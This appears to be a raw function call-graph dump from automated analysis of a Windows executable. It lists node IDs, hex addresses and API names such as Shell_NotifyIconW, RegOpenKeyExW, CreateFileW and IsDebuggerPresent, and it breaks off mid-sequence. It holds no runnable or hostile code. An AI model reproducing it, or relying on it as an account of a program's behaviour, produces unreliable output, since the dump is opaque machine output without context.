92781->92782 92782->92775 92783 5ee6dd 92784 5ee68a 92783->92784 92784->92783 92786 5fe753 SHGetFolderPathW 92784->92786 92787 5984b7 8 API calls 92786->92787 92788 5fe780 92787->92788 92788->92784 92789 59367c 92792 593696 92789->92792 92793 5936ad 92792->92793 92794 593711 92793->92794 92795 5936b2 92793->92795 92832 59370f 92793->92832 92797 5d3dce 92794->92797 92798 593717 92794->92798 92799 59378b PostQuitMessage 92795->92799 92800 5936bf 92795->92800 92796 5936f6 DefWindowProcW 92834 593690 92796->92834 92848 592f24 10 API calls 92797->92848 92802 59371e 92798->92802 92803 593743 SetTimer RegisterWindowMessageW 92798->92803 92799->92834 92804 5936ca 92800->92804 92805 5d3e3b 92800->92805 92811 5d3d6f 92802->92811 92812 593727 KillTimer 92802->92812 92806 59376c CreatePopupMenu 92803->92806 92803->92834 92807 593795 92804->92807 92808 5936d4 92804->92808 92853 5fc80c 65 API calls ___scrt_fastfail 92805->92853 92806->92834 92837 5afcbb 92807->92837 92813 5936df 92808->92813 92814 5d3e20 92808->92814 92810 5d3def 92849 5af1c6 40 API calls 92810->92849 92818 5d3daa MoveWindow 92811->92818 92819 5d3d74 92811->92819 92844 59388e Shell_NotifyIconW ___scrt_fastfail 92812->92844 92821 593779 92813->92821 92826 5936ea 92813->92826 92814->92796 92852 5f1367 8 API calls 92814->92852 92815 5d3e4d 92815->92796 92815->92834 92818->92834 92822 5d3d99 SetFocus 92819->92822 92823 5d3d7a 92819->92823 92846 5937a6 75 API calls ___scrt_fastfail 92821->92846 92822->92834 92823->92826 92827 5d3d83 92823->92827 92824 59373a 92845 59572c DeleteObject DestroyWindow 92824->92845 92826->92796 92850 59388e Shell_NotifyIconW ___scrt_fastfail 92826->92850 92847 592f24 10 API calls 92827->92847 92830 593789 92830->92834 92832->92796 92835 5d3e14 92851 5938f2 60 API calls ___scrt_fastfail 92835->92851 92838 5afd59 92837->92838 92839 5afcd3 ___scrt_fastfail 92837->92839 92838->92834 92854 595f59 92839->92854 92841 5afd42 KillTimer SetTimer 92841->92838 92842 5afcfa 92842->92841 92843 5efdcb Shell_NotifyIconW 92842->92843 92843->92841 92844->92824 92845->92834 92846->92830 92847->92834 92848->92810 92849->92826 92850->92835 92851->92832 92852->92832 92853->92815 92855 595f76 92854->92855 92874 596058 92854->92874 92884 597a14 92855->92884 92858 595f91 92860 5984b7 8 API calls 92858->92860 92859 5d5101 LoadStringW 92862 5d511b 92859->92862 92861 595fa6 92860->92861 92863 595fb3 92861->92863 92869 5d5137 92861->92869 92867 595fd9 ___scrt_fastfail 92862->92867 92898 59be6d 92862->92898 92863->92862 92864 595fbd 92863->92864 92866 5965a4 8 API calls 92864->92866 92868 595fcb 92866->92868 92871 59603e Shell_NotifyIconW 92867->92871 92889 597af4 92868->92889 92869->92867 92872 5d517a 92869->92872 92873 59bf07 8 API calls 92869->92873 92871->92874 92903 5afe8f 51 API calls 92872->92903 92875 5d5161 92873->92875 92874->92842 92902 5fa265 9 API calls 92875->92902 92878 5d516c 92880 597af4 8 API calls 92878->92880 92879 5d5199 92881 5965a4 8 API calls 92879->92881 92880->92872 92882 5d51aa 92881->92882 92883 5965a4 8 API calls 92882->92883 92883->92867 92885 5b019b 8 API calls 92884->92885 92886 597a39 92885->92886 92887 5b016b 8 API calls 92886->92887 92888 595f84 92887->92888 92888->92858 92888->92859 92890 5d63b3 92889->92890 92891 597b06 92889->92891 92914 59662b 8 API calls __fread_nolock 92890->92914 92904 597b17 92891->92904 92894 597b12 92894->92867 92895 5d63bd 92896 5d63c9 92895->92896 92897 59be6d 8 API calls 92895->92897 92897->92896 92899 59be90 __fread_nolock 92898->92899 92900 59be81 92898->92900 92899->92867 92900->92899 92901 5b019b 8 API calls 92900->92901 92901->92899 92902->92878 92903->92879 92905 597b26 92904->92905 92910 597b5a __fread_nolock 92904->92910 92906 5d63e4 92905->92906 92907 597b4d 92905->92907 92905->92910 92908 5b016b 8 API calls 92906->92908 92909 597cb3 8 API calls 92907->92909 92911 5d63f3 92908->92911 92909->92910 92910->92894 92912 5b019b 8 API calls 92911->92912 92913 5d6427 __fread_nolock 92912->92913 92914->92895 92915 59f470 92918 5a9fa5 92915->92918 92917 59f47c 92919 5a9fc6 92918->92919 92925 5aa023 92918->92925 92919->92925 92927 5a02f0 92919->92927 92922 5e800f 92922->92922 92923 5aa067 92923->92917 92924 5a9ff7 92924->92923 92924->92925 92926 59be6d 8 API calls 92924->92926 92925->92923 92950 603ef6 81 API calls __wsopen_s 92925->92950 92926->92925 92946 5a0326 ISource 92927->92946 92928 5b016b 8 API calls 92928->92946 92929 5e62cf 92956 603ef6 81 API calls __wsopen_s 92929->92956 92931 5a1645 92936 59be6d 8 API calls 92931->92936 92943 5a044d ISource 92931->92943 92933 5e5c7f 92941 59be6d 8 API calls 92933->92941 92933->92943 92934 5e61fe 92955 603ef6 81 API calls __wsopen_s 92934->92955 92935 59be6d 8 API calls 92935->92946 92936->92943 92939 5b05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 92939->92946 92941->92943 92942 59bf07 8 API calls 92942->92946 92943->92924 92944 5b0433 29 API calls pre_c_initialization 92944->92946 92945 5e60b9 92953 603ef6 81 API calls __wsopen_s 92945->92953 92946->92928 92946->92929 92946->92931 92946->92933 92946->92934 92946->92935 92946->92939 92946->92942 92946->92943 92946->92944 92946->92945 92947 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 92946->92947 92949 5a0a5e ISource 92946->92949 92951 5a1940 254 API calls 2 library calls 92946->92951 92952 5a1e00 40 API calls ISource 92946->92952 92947->92946 92954 603ef6 81 API calls __wsopen_s 92949->92954 92950->92922 92951->92946 92952->92946 92953->92949 92954->92943 92955->92943 92956->92943 92957 591033 92962 596686 92957->92962 92961 591042 92963 59bf07 8 API calls 92962->92963 92964 5966f4 92963->92964 92970 5955cc 92964->92970 92966 596791 92967 591038 92966->92967 92973 5968e6 8 API calls __fread_nolock 92966->92973 92969 5b0433 29 API calls __onexit 92967->92969 92969->92961 92974 5955f8 92970->92974 92973->92966 92975 5955eb 92974->92975 92976 595605 92974->92976 92975->92966 92976->92975 92977 59560c RegOpenKeyExW 92976->92977 92977->92975 92978 595626 RegQueryValueExW 92977->92978 92979 59565c RegCloseKey 92978->92979 92980 595647 92978->92980 92979->92975 92980->92979 92981 5e55f4 92990 5ae34f 92981->92990 92983 5e560a 92985 5e5685 92983->92985 92999 5aa9e5 9 API calls 92983->92999 92988 5e617b 92985->92988 93001 603ef6 81 API calls __wsopen_s 92985->93001 92987 5e5665 92987->92985 93000 602393 8 API calls 92987->93000 92991 5ae35d 92990->92991 92992 5ae370 92990->92992 93002 59b3fe 92991->93002 92994 5ae3a3 92992->92994 92995 5ae375 92992->92995 92997 59b3fe 8 API calls 92994->92997 92996 5b016b 8 API calls 92995->92996 92998 5ae367 92996->92998 92997->92998 92998->92983 92999->92987 93000->92985 93001->92988 93003 59b412 93002->93003 93004 59b40c 93002->93004 93003->92998 93004->93003 93005 59be6d 8 API calls 93004->93005 93005->93003 93006 5c8792 93011 5c854e 93006->93011 93009 5c87ba 93016 5c857f try_get_first_available_module 93011->93016 93013 5c877e 93035 5c2b7c 26 API calls _abort 93013->93035 93015 5c86d3 93015->93009 93023 5d0d24 93015->93023 93019 5c86c8 93016->93019 93026 5b919b 93016->93026 93019->93015 93034 5bf669 20 API calls _abort 93019->93034 93020 5b919b 40 API calls 93021 5c873b 93020->93021 93021->93019 93022 5b919b 40 API calls 93021->93022 93022->93019 93039 5d0421 93023->93039 93025 5d0d3f 93025->93009 93027 5b923b 93026->93027 93028 5b91af 93026->93028 93038 5b9253 40 API calls 3 library calls 93027->93038 93031 5b91d1 93028->93031 93036 5bf669 20 API calls _abort 93028->93036 93031->93019 93031->93020 93032 5b91c6 93037 5c2b7c 26 API calls _abort 93032->93037 93034->93013 93035->93015 93036->93032 93037->93031 93038->93031 93042 5d042d ___scrt_is_nonwritable_in_current_image 93039->93042 93040 5d043b 93097 5bf669 20 API calls _abort 93040->93097 93042->93040 93044 5d0474 93042->93044 93043 5d0440 93098 5c2b7c 26 API calls _abort 93043->93098 93050 5d09fb 93044->93050 93049 5d044a __fread_nolock 93049->93025 93100 5d07cf 93050->93100 93053 5d0a2d 93132 5bf656 20 API calls _abort 93053->93132 93054 5d0a46 93118 5c55b1 93054->93118 93057 5d0a32 93133 5bf669 20 API calls _abort 93057->93133 93058 5d0a4b 93059 5d0a6b 93058->93059 93060 5d0a54 93058->93060 93131 5d073a CreateFileW 93059->93131 93134 5bf656 20 API calls _abort 93060->93134 93064 5d0a59 93135 5bf669 20 API calls _abort 93064->93135 93065 5d0498 93099 5d04c1 LeaveCriticalSection __wsopen_s 93065->93099 93067 5d0b21 GetFileType 93069 5d0b2c GetLastError 93067->93069 93070 5d0b73 93067->93070 93068 5d0af6 GetLastError 93137 5bf633 20 API calls __dosmaperr 93068->93137 93138 5bf633 20 API calls __dosmaperr 93069->93138 93140 5c54fa 21 API calls 2 library calls 93070->93140 93072 5d0aa4 93072->93067 93072->93068 93136 5d073a CreateFileW 93072->93136 93074 5d0b3a CloseHandle 93074->93057 93076 5d0b63 93074->93076 93139 5bf669 20 API calls _abort 93076->93139 93078 5d0ae9 93078->93067 93078->93068 93080 5d0b94 93082 5d0be0 93080->93082 93141 5d094b 72 API calls 3 library calls 93080->93141 93081 5d0b68 93081->93057 93086 5d0c0d 93082->93086 93142 5d04ed 72 API calls 4 library calls 93082->93142 93085 5d0c06 93085->93086 93087 5d0c1e 93085->93087 93143 5c8a3e 93086->93143 93087->93065 93089 5d0c9c CloseHandle 93087->93089 93158 5d073a CreateFileW 93089->93158 93091 5d0cc7 93092 5d0cd1 GetLastError 93091->93092 93093 5d0cfd 93091->93093 93159 5bf633 20 API calls __dosmaperr 93092->93159 93093->93065 93095 5d0cdd 93160 5c56c3 21 API calls 2 library calls 93095->93160 93097->93043 93098->93049 93099->93049 93101 5d080a 93100->93101 93102 5d07f0 93100->93102 93161 5d075f 93101->93161 93102->93101 93168 5bf669 20 API calls _abort 93102->93168 93105 5d07ff 93169 5c2b7c 26 API calls _abort 93105->93169 93107 5d0842 93108 5d0871 93107->93108 93170 5bf669 20 API calls _abort 93107->93170 93111 5d08c4 93108->93111 93172 5bda9d 26 API calls 2 library calls 93108->93172 93111->93053 93111->93054 93112 5d08bf 93112->93111 93114 5d093e 93112->93114 93113 5d0866 93171 5c2b7c 26 API calls _abort 93113->93171 93173 5c2b8c 11 API calls _abort 93114->93173 93117 5d094a 93119 5c55bd ___scrt_is_nonwritable_in_current_image 93118->93119 93176 5c32ee EnterCriticalSection 93119->93176 93121 5c560b 93177 5c56ba 93121->93177 93122 5c55c4 93122->93121 93123 5c55e9 93122->93123 93128 5c5657 EnterCriticalSection 93122->93128 93180 5c5390 93123->93180 93126 5c5634 __fread_nolock 93126->93058 93128->93121 93129 5c5664 LeaveCriticalSection 93128->93129 93129->93122 93131->93072 93132->93057 93133->93065 93134->93064 93135->93057 93136->93078 93137->93057 93138->93074 93139->93081 93140->93080 93141->93082 93142->93085 93206 5c5754 93143->93206 93145 5c8a54 93219 5c56c3 21 API calls 2 library calls 93145->93219 93146 5c8a4e 93146->93145 93147 5c8a86 93146->93147 93149 5c5754 __wsopen_s 26 API calls 93146->93149 93147->93145 93150 5c5754 __wsopen_s 26 API calls 93147->93150 93152 5c8a7d 93149->93152 93153 5c8a92 FindCloseChangeNotification 93150->93153 93151 5c8aac 93154 5c8ace 93151->93154 93220 5bf633 20 API calls __dosmaperr 93151->93220 93155 5c5754 __wsopen_s 26 API calls 93152->93155 93153->93145 93156 5c8a9e GetLastError 93153->93156 93154->93065 93155->93147 93156->93145 93158->93091 93159->93095 93160->93093 93162 5d0777 93161->93162 93165 5d0792 93162->93165 93174 5bf669 20 API calls _abort 93162->93174 93164 5d07b6 93175 5c2b7c 26 API calls _abort 93164->93175 93165->93107 93167 5d07c1 93167->93107 93168->93105 93169->93101 93170->93113 93171->93108 93172->93112 93173->93117 93174->93164 93175->93167 93176->93122 93188 5c3336 LeaveCriticalSection 93177->93188 93179 5c56c1 93179->93126 93189 5c500d 93180->93189 93182 5c53af 93197 5c2d58 93182->93197 93183 5c53a2 93183->93182 93196 5c3795 11 API calls 2 library calls 93183->93196 93186 5c5401 93186->93121 93187 5c54d7 EnterCriticalSection 93186->93187 93187->93121 93188->93179 93194 5c501a _abort 93189->93194 93190 5c505a 93204 5bf669 20 API calls _abort 93190->93204 93191 5c5045 RtlAllocateHeap 93192 5c5058 93191->93192 93191->93194 93192->93183 93194->93190 93194->93191 93203 5b523d 7 API calls 2 library calls 93194->93203 93196->93183 93198 5c2d63 RtlFreeHeap 93197->93198 93202 5c2d8c __dosmaperr 93197->93202 93199 5c2d78 93198->93199 93198->93202 93205 5bf669 20 API calls _abort 93199->93205 93201 5c2d7e GetLastError 93201->93202 93202->93186 93203->93194 93204->93192 93205->93201 93207 5c5776 93206->93207 93208 5c5761 93206->93208 93213 5c579b 93207->93213 93223 5bf656 20 API calls _abort 93207->93223 93221 5bf656 20 API calls _abort 93208->93221 93210 5c5766 93222 5bf669 20 API calls _abort 93210->93222 93213->93146 93214 5c57a6 93224 5bf669 20 API calls _abort 93214->93224 93216 5c576e 93216->93146 93217 5c57ae 93225 5c2b7c 26 API calls _abort 93217->93225 93219->93151 93220->93154 93221->93210 93222->93216 93223->93214 93224->93217 93225->93216 93226 5e506e 93236 59f7b0 ISource 93226->93236 93228 5a1c50 8 API calls 93228->93236 93230 59bf07 8 API calls 93230->93236 93232 59be6d 8 API calls 93232->93236 93234 603ef6 81 API calls 93234->93236 93236->93228 93236->93230 93236->93232 93236->93234 93237 59fa91 93236->93237 93238 5a02f0 254 API calls 93236->93238 93241 59bdc1 93236->93241 93245 5ab2d6 254 API calls 93236->93245 93246 5b05d2 5 API calls __Init_thread_wait 93236->93246 93247 5b0433 29 API calls __onexit 93236->93247 93248 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93236->93248 93249 615131 101 API calls 93236->93249 93250 61721e 254 API calls 93236->93250 93238->93236 93242 59bdcc 93241->93242 93243 59bdfb 93242->93243 93251 59bf39 39 API calls 93242->93251 93243->93236 93245->93236 93246->93236 93247->93236 93248->93236 93249->93236 93250->93236 93251->93243 93252 5b078b 93253 5b0797 ___scrt_is_nonwritable_in_current_image 93252->93253 93282 5b0241 93253->93282 93255 5b079e 93256 5b08f1 93255->93256 93259 5b07c8 93255->93259 93323 5b0bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 93256->93323 93258 5b08f8 93316 5b51e2 93258->93316 93271 5b0807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93259->93271 93293 5c280d 93259->93293 93266 5b07e7 93268 5b0868 93301 5b0ce9 93268->93301 93270 5b086e 93305 5932a2 93270->93305 93271->93268 93319 5b51aa 38 API calls 2 library calls 93271->93319 93276 5b088a 93276->93258 93277 5b088e 93276->93277 93278 5b0897 93277->93278 93321 5b5185 28 API calls _abort 93277->93321 93322 5b03d0 13 API calls 2 library calls 93278->93322 93281 5b089f 93281->93266 93283 5b024a 93282->93283 93325 5b0a28 IsProcessorFeaturePresent 93283->93325 93285 5b0256 93326 5b3024 10 API calls 3 library calls 93285->93326 93287 5b025b 93292 5b025f 93287->93292 93327 5c26a7 93287->93327 93290 5b0276 93290->93255 93292->93255 93294 5c2824 93293->93294 93295 5b0e1c _ValidateLocalCookies 5 API calls 93294->93295 93296 5b07e1 93295->93296 93296->93266 93297 5c27b1 93296->93297 93298 5c27e0 93297->93298 93299 5b0e1c _ValidateLocalCookies 5 API calls 93298->93299 93300 5c2809 93299->93300 93300->93271 93378 5b26d0 93301->93378 93304 5b0d0f 93304->93270 93306 593309 93305->93306 93307 5932ae IsThemeActive 93305->93307 93320 5b0d22 GetModuleHandleW 93306->93320 93380 5b52d3 93307->93380 93309 5932d9 93386 5b5339 93309->93386 93311 5932e0 93393 59326d SystemParametersInfoW SystemParametersInfoW 93311->93393 93313 5932e7 93394 593312 93313->93394 94436 5b4f5f 93316->94436 93319->93268 93320->93276 93321->93278 93322->93281 93323->93258 93325->93285 93326->93287 93331 5cd596 93327->93331 93330 5b304d 8 API calls 3 library calls 93330->93292 93334 5cd5b3 93331->93334 93335 5cd5af 93331->93335 93333 5b0268 93333->93290 93333->93330 93334->93335 93337 5c4f8b 93334->93337 93349 5b0e1c 93335->93349 93338 5c4f97 ___scrt_is_nonwritable_in_current_image 93337->93338 93356 5c32ee EnterCriticalSection 93338->93356 93340 5c4f9e 93357 5c543f 93340->93357 93342 5c4fad 93343 5c4fbc 93342->93343 93370 5c4e1f 29 API calls 93342->93370 93372 5c4fd8 LeaveCriticalSection _abort 93343->93372 93346 5c4fb7 93371 5c4ed5 GetStdHandle GetFileType 93346->93371 93348 5c4fcd __fread_nolock 93348->93334 93350 5b0e27 IsProcessorFeaturePresent 93349->93350 93351 5b0e25 93349->93351 93353 5b0fee 93350->93353 93351->93333 93377 5b0fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93353->93377 93355 5b10d1 93355->93333 93356->93340 93358 5c544b ___scrt_is_nonwritable_in_current_image 93357->93358 93359 5c546f 93358->93359 93360 5c5458 93358->93360 93373 5c32ee EnterCriticalSection 93359->93373 93374 5bf669 20 API calls _abort 93360->93374 93363 5c545d 93375 5c2b7c 26 API calls _abort 93363->93375 93365 5c5467 __fread_nolock 93365->93342 93366 5c547b 93368 5c5390 __wsopen_s 21 API calls 93366->93368 93369 5c54a7 93366->93369 93368->93366 93376 5c54ce LeaveCriticalSection _abort 93369->93376 93370->93346 93371->93343 93372->93348 93373->93366 93374->93363 93375->93365 93376->93365 93377->93355 93379 5b0cfc GetStartupInfoW 93378->93379 93379->93304 93381 5b52df ___scrt_is_nonwritable_in_current_image 93380->93381 93443 5c32ee EnterCriticalSection 93381->93443 93383 5b52ea pre_c_initialization 93444 5b532a 93383->93444 93385 5b531f __fread_nolock 93385->93309 93387 5b535f 93386->93387 93388 5b5345 93386->93388 93387->93311 93388->93387 93448 5bf669 20 API calls _abort 93388->93448 93390 5b534f 93449 5c2b7c 26 API calls _abort 93390->93449 93392 5b535a 93392->93311 93393->93313 93395 593322 __wsopen_s 93394->93395 93396 59bf07 8 API calls 93395->93396 93397 59332e GetCurrentDirectoryW 93396->93397 93450 594f60 93397->93450 93399 593355 IsDebuggerPresent 93400 5d3c7d MessageBoxA 93399->93400 93401 593363 93399->93401 93402 5d3c95 93400->93402 93401->93402 93403 593377 93401->93403 93556 5940e0 93402->93556 93518 593a1c 93403->93518 93443->93383 93447 5c3336 LeaveCriticalSection 93444->93447 93446 5b5331 93446->93385 93447->93446 93448->93390 93449->93392 93451 59bf07 8 API calls 93450->93451 93452 594f76 93451->93452 93565 5960f5 93452->93565 93454 594f94 93455 59bceb 8 API calls 93454->93455 93456 594fa8 93455->93456 93457 59be6d 8 API calls 93456->93457 93458 594fb3 93457->93458 93579 5988e8 93458->93579 93461 59b25f 8 API calls 93462 594fcc 93461->93462 93463 59bdc1 39 API calls 93462->93463 93464 594fdc 93463->93464 93465 59b25f 8 API calls 93464->93465 93466 595002 93465->93466 93467 59bdc1 39 API calls 93466->93467 93468 595011 93467->93468 93469 59bf07 8 API calls 93468->93469 93470 59502f 93469->93470 93582 595151 93470->93582 93474 595049 93475 5d4afd 93474->93475 93476 595053 93474->93476 93478 595151 8 API calls 93475->93478 93477 5b4db8 _strftime 40 API calls 93476->93477 93479 59505e 93477->93479 93480 5d4b11 93478->93480 93479->93480 93481 595068 93479->93481 93482 595151 8 API calls 93480->93482 93483 5b4db8 _strftime 40 API calls 93481->93483 93484 5d4b2d 93482->93484 93485 595073 93483->93485 93487 59551b 10 API calls 93484->93487 93485->93484 93486 59507d 93485->93486 93488 5b4db8 _strftime 40 API calls 93486->93488 93489 5d4b50 93487->93489 93490 595088 93488->93490 93491 595151 8 API calls 93489->93491 93492 595092 93490->93492 93493 5d4b79 93490->93493 93495 5d4b5c 93491->93495 93496 5950b5 93492->93496 93497 59be6d 8 API calls 93492->93497 93494 595151 8 API calls 93493->93494 93498 5d4b97 93494->93498 93500 59be6d 8 API calls 93495->93500 93499 5d4bb4 93496->93499 93598 597d51 93496->93598 93501 5950a8 93497->93501 93502 59be6d 8 API calls 93498->93502 93504 5d4b6a 93500->93504 93505 595151 8 API calls 93501->93505 93506 5d4ba5 93502->93506 93508 595151 8 API calls 93504->93508 93505->93496 93509 595151 8 API calls 93506->93509 93508->93493 93509->93499 93513 5988e8 8 API calls 93515 5950ee 93513->93515 93514 598a10 8 API calls 93514->93515 93515->93513 93515->93514 93516 595132 93515->93516 93517 595151 8 API calls 93515->93517 93516->93399 93517->93515 93519 593a29 __wsopen_s 93518->93519 93557 5940ee 93556->93557 93558 594145 93556->93558 93559 5940ff 93557->93559 93561 5b016b 8 API calls 93557->93561 93561->93559 93566 596102 __wsopen_s 93565->93566 93567 5984b7 8 API calls 93566->93567 93568 596134 93566->93568 93567->93568 93570 59616a 93568->93570 93620 59627c 93568->93620 93571 596238 93570->93571 93575 59b25f 8 API calls 93570->93575 93577 59627c 8 API calls 93570->93577 93578 59684e 8 API calls 93570->93578 93572 59626d 93571->93572 93573 59b25f 8 API calls 93571->93573 93572->93454 93574 596261 93573->93574 93576 59684e 8 API calls 93574->93576 93575->93570 93576->93572 93577->93570 93578->93570 93580 5b016b 8 API calls 93579->93580 93581 594fbf 93580->93581 93581->93461 93583 595179 93582->93583 93584 59515b 93582->93584 93585 5984b7 8 API calls 93583->93585 93586 59503b 93584->93586 93587 59be6d 8 API calls 93584->93587 93585->93586 93588 5b4db8 93586->93588 93587->93586 93589 5b4e3b 93588->93589 93590 5b4dc6 93588->93590 93625 5b4e4d 40 API calls 3 library calls 93589->93625 93597 5b4deb 93590->93597 93623 5bf669 20 API calls _abort 93590->93623 93593 5b4e48 93593->93474 93594 5b4dd2 93624 5c2b7c 26 API calls _abort 93594->93624 93596 5b4ddd 93596->93474 93597->93474 93599 597d59 93598->93599 93600 5b016b 8 API calls 93599->93600 93601 597d67 93600->93601 93626 598386 93601->93626 93604 5983b0 93629 59c700 93604->93629 93606 5983c0 93607 5b019b 8 API calls 93606->93607 93608 5950d3 93606->93608 93607->93608 93609 598a10 93608->93609 93610 598a26 93609->93610 93611 5d6728 93610->93611 93617 598a30 93610->93617 93642 5ab71c 8 API calls 93611->93642 93612 5d6735 93614 59b3fe 8 API calls 93612->93614 93615 5d6753 93614->93615 93615->93615 93616 598b44 93618 5b016b 8 API calls 93616->93618 93617->93612 93617->93616 93619 598b4b 93617->93619 93618->93619 93619->93515 93621 59c269 8 API calls 93620->93621 93622 596287 93621->93622 93622->93568 93623->93594 93624->93596 93625->93593 93627 5b016b 8 API calls 93626->93627 93628 5950c5 93627->93628 93628->93604 93630 59c70b 93629->93630 93631 5e1228 93630->93631 93636 59c713 ISource 93630->93636 93632 5b016b 8 API calls 93631->93632 93634 5e1234 93632->93634 93633 59c71a 93633->93606 93636->93633 93637 59c780 93636->93637 93638 59c78b ISource 93637->93638 93640 59c7c6 ISource 93638->93640 93641 5ae29c 8 API calls ISource 93638->93641 93640->93636 93641->93640 93642->93612 94437 5b4f6b _abort 94436->94437 94438 5b4f72 94437->94438 94439 5b4f84 94437->94439 94475 5b50b9 GetModuleHandleW 94438->94475 94460 5c32ee EnterCriticalSection 94439->94460 94442 5b4f77 94442->94439 94476 5b50fd GetModuleHandleExW 94442->94476 94443 5b5029 94464 5b5069 94443->94464 94446 5b4f8b 94446->94443 94448 5b5000 94446->94448 94461 5c2538 94446->94461 94452 5b5018 94448->94452 94453 5c27b1 _abort 5 API calls 94448->94453 94450 5b5072 94484 5d20c9 5 API calls _ValidateLocalCookies 94450->94484 94451 5b5046 94467 5b5078 94451->94467 94454 5c27b1 _abort 5 API calls 94452->94454 94453->94452 94454->94443 94460->94446 94485 5c2271 94461->94485 94504 5c3336 LeaveCriticalSection 94464->94504 94466 5b5042 94466->94450 94466->94451 94505 5c399c 94467->94505 94470 5b50a6 94473 5b50fd _abort 8 API calls 94470->94473 94471 5b5086 GetPEB 94471->94470 94472 5b5096 GetCurrentProcess TerminateProcess 94471->94472 94472->94470 94474 5b50ae ExitProcess 94473->94474 94475->94442 94477 5b514a 94476->94477 94478 5b5127 GetProcAddress 94476->94478 94480 5b5159 94477->94480 94481 5b5150 FreeLibrary 94477->94481 94479 5b513c 94478->94479 94479->94477 94482 5b0e1c _ValidateLocalCookies 5 API calls 94480->94482 94481->94480 94483 5b4f83 94482->94483 94483->94439 94488 5c2220 94485->94488 94487 5c2295 94487->94448 94489 5c222c ___scrt_is_nonwritable_in_current_image 94488->94489 94496 5c32ee EnterCriticalSection 94489->94496 94491 5c223a 94497 5c22c1 94491->94497 94495 5c2258 __fread_nolock 94495->94487 94496->94491 94500 5c22e1 94497->94500 94501 5c22e9 94497->94501 94498 5b0e1c _ValidateLocalCookies 5 API calls 94499 5c2247 94498->94499 94503 5c2265 LeaveCriticalSection _abort 94499->94503 94500->94498 94501->94500 94502 5c2d58 _free 20 API calls 94501->94502 94502->94500 94503->94495 94504->94466 94506 5c39b7 94505->94506 94507 5c39c1 94505->94507 94509 5b0e1c _ValidateLocalCookies 5 API calls 94506->94509 94512 5c3367 5 API calls 2 library calls 94507->94512 94510 5b5082 94509->94510 94510->94470 94510->94471 94511 5c39d8 94511->94506 94512->94511 94513 5e3bae 94534 5fc72e 94513->94534 94516 5e3bb8 94517 5e3be3 94516->94517 94518 5fc72e Sleep 94516->94518 94523 59ef8b 94516->94523 94540 5aa9e5 9 API calls 94516->94540 94519 59b25f 8 API calls 94517->94519 94518->94516 94520 5e3c13 94519->94520 94541 59bf39 39 API calls 94520->94541 94522 5e3c2f 94542 604384 8 API calls 94522->94542 94527 59f400 94523->94527 94526 59f047 94528 59f41f 94527->94528 94529 59f433 94527->94529 94543 59e910 94528->94543 94575 603ef6 81 API calls __wsopen_s 94529->94575 94532 59f42a 94532->94526 94533 5e4528 94533->94533 94535 5fc754 94534->94535 94537 5fc739 94534->94537 94536 5fc782 94535->94536 94538 5fc766 Sleep 94535->94538 94536->94516 94537->94516 94538->94536 94540->94516 94541->94522 94542->94526 94544 5a02f0 254 API calls 94543->94544 94549 59e94d 94544->94549 94545 5e3176 94582 603ef6 81 API calls __wsopen_s 94545->94582 94547 59e9bb ISource 94547->94532 94548 59ed85 94548->94547 94559 5b019b 8 API calls 94548->94559 94549->94545 94549->94547 94549->94548 94550 59ea73 94549->94550 94556 59eb68 94549->94556 94563 5b016b 8 API calls 94549->94563 94570 59ead9 ISource __fread_nolock 94549->94570 94550->94548 94551 59ea7e 94550->94551 94553 5b016b 8 API calls 94551->94553 94552 59ecaf 94554 5e3167 94552->94554 94555 59ecc4 94552->94555 94564 59ea85 __fread_nolock 94553->94564 94581 616062 8 API calls 94554->94581 94558 5b016b 8 API calls 94555->94558 94560 5b019b 8 API calls 94556->94560 94568 59eb1a 94558->94568 94559->94564 94560->94570 94561 59eaa6 94561->94570 94576 59d210 254 API calls 94561->94576 94562 5b016b 8 API calls 94562->94561 94563->94549 94564->94561 94564->94562 94566 5e3156 94580 603ef6 81 API calls __wsopen_s 94566->94580 94568->94532 94570->94552 94570->94566 94570->94568 94571 5e3131 94570->94571 94573 5e310f 94570->94573 94577 594485 254 API calls 94570->94577 94579 603ef6 81 API calls __wsopen_s 94571->94579 94578 603ef6 81 API calls __wsopen_s 94573->94578 94575->94533 94576->94570 94577->94570 94578->94568 94579->94568 94580->94568 94581->94545 94582->94547 94583 5a0e6f 94584 5a0e83 94583->94584 94589 5a13d5 94583->94589 94585 5a0e95 94584->94585 94586 5b016b 8 API calls 94584->94586 94587 5e55d0 94585->94587 94588 59b3fe 8 API calls 94585->94588 94590 5a0eee 94585->94590 94586->94585 94686 601a29 8 API calls 94587->94686 94588->94585 94589->94585 94593 59be6d 8 API calls 94589->94593 94609 5a044d ISource 94590->94609 94616 5a2ad0 94590->94616 94593->94585 94594 5b016b 8 API calls 94615 5a0326 ISource 94594->94615 94595 5e62cf 94690 603ef6 81 API calls __wsopen_s 94595->94690 94597 5a1645 94601 59be6d 8 API calls 94597->94601 94597->94609 94599 5e5c7f 94605 59be6d 8 API calls 94599->94605 94599->94609 94600 5e61fe 94689 603ef6 81 API calls __wsopen_s 94600->94689 94601->94609 94605->94609 94606 59be6d 8 API calls 94606->94615 94607 5b05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94607->94615 94608 59bf07 8 API calls 94608->94615 94610 5b0433 29 API calls pre_c_initialization 94610->94615 94611 5e60b9 94687 603ef6 81 API calls __wsopen_s 94611->94687 94613 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94613->94615 94614 5a0a5e ISource 94688 603ef6 81 API calls __wsopen_s 94614->94688 94615->94594 94615->94595 94615->94597 94615->94599 94615->94600 94615->94606 94615->94607 94615->94608 94615->94609 94615->94610 94615->94611 94615->94613 94615->94614 94684 5a1940 254 API calls 2 library calls 94615->94684 94685 5a1e00 40 API calls ISource 94615->94685 94617 5a2f70 94616->94617 94618 5a2b36 94616->94618 94997 5b05d2 5 API calls __Init_thread_wait 94617->94997 94620 5e7b7c 94618->94620 94621 5a2b50 94618->94621 95001 6179f9 254 API calls 94620->95001 94691 5a30e0 94621->94691 94623 5a2f7a 94626 5a2fbb 94623->94626 94628 59b25f 8 API calls 94623->94628 94625 5e7b88 94625->94615 94632 5e7b91 94626->94632 